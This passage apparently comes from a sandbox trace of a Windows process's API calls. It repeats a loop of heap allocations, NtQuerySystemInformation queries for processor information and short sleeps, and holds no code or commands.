dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.161] Sleep (dwMilliseconds=0x110) [0224.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.174] Sleep (dwMilliseconds=0x110) [0224.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.193] Sleep (dwMilliseconds=0x110) [0224.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.207] Sleep (dwMilliseconds=0x110) [0224.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.237] Sleep (dwMilliseconds=0x110) [0224.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.254] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.255] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.255] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.255] Sleep (dwMilliseconds=0x110) [0224.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.270] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.271] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.271] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.271] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.272] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.272] Sleep (dwMilliseconds=0x110) [0224.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.286] Sleep (dwMilliseconds=0x110) [0224.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.302] Sleep (dwMilliseconds=0x110) [0224.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.317] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.318] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.319] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.319] Sleep (dwMilliseconds=0x110) [0224.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.330] Sleep (dwMilliseconds=0x110) [0224.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.348] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.349] Sleep (dwMilliseconds=0x110) [0224.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.368] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.368] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.368] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.376] Sleep (dwMilliseconds=0x110) [0224.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.411] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.412] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.412] Sleep (dwMilliseconds=0x110) [0224.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 